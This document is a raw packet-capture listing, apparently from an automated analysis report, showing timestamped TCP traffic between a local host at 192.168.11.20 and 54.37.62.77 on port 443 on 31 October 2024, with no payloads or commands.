                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465231895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465231895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465296030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465296030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465327024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465399027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465500116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465996027 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466052055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466175079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466227055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466227055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466252089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466273069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.466394901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471807957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471862078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471991062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.471991062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472178936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472230911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472471952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.472954988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473007917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473170996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473170996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473310947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473366976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.473561049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474045992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474098921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474232912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474234104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474282980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474394083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.474438906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475199938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475254059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475452900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475507021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475541115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.475702047 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476465940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476520061 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476680994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476680994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476741076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476775885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476775885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.476958990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477699041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477752924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477900028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477900028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477950096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477950096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477950096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.477982998 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.478152990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.478895903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.478952885 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479052067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479052067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479101896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479101896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479130030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479157925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.479290009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480282068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480343103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480489016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480489016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480551958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480580091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480608940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.480695009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481400967 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481456995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481585979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481585979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481689930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481719971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.481863976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482497931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482551098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482692957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482693911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482799053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482831001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.482997894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643570900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643614054 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643713951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643713951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643764973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643806934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643831968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643877983 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.643948078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647499084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647545099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647700071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647700071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647700071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647766113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647785902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647785902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.647891045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648644924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648689032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648845911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648845911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648905039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648925066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.648925066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649108887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649636984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649681091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649849892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649849892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649909973 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649929047 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.649929047 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650141954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650444984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650490046 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650671959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650671959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650717974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650743961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.650947094 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651293993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651349068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651489973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651490927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651556969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651556969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651557922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651592016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.651740074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652515888 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652561903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652729034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652729988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652786016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652812958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.652842999 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.653032064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.653650045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.653701067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.653867006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.653937101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.653976917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654170990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654773951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654818058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654921055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654922009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654969931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.654994011 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655018091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655018091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655158997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655632019 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655698061 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655807018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655853033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655853033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655874968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.655901909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.656016111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.656759024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.656816006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.656928062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.656929016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.657000065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.657001019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.657027006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.657049894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.657185078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660046101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660095930 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660300016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660300016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660355091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660427094 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.660511017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.663796902 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.663856030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664062977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664063931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664063931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664136887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664400101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664899111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.664948940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.665117979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694644928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694785118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694785118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694835901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694835901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694835901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.694865942 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.695096970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.695801020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.695844889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.695990086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.695990086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.696043015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.696043015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.696073055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.696103096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.696213961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.696273088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697334051 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697388887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697561026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697561026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697622061 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697655916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697820902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.697952032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698204994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698249102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698477030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698477030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698534012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698555946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.698717117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699018002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699246883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699304104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699445963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699445963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699493885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699520111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699551105 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.699707985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700031996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700388908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700436115 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700589895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700589895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700654030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700654030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700654030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700686932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700913906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.700915098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701342106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701395035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701539040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701539040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701602936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701602936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701602936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701636076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.701859951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702142954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702276945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702327967 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702497959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702497959 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702545881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702570915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702666044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.702708960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703425884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703471899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703486919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703609943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703653097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703653097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703684092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.703968048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704674006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704757929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704901934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704945087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704945087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704945087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.704979897 CET4434975554.37.62.77192.168.11.20
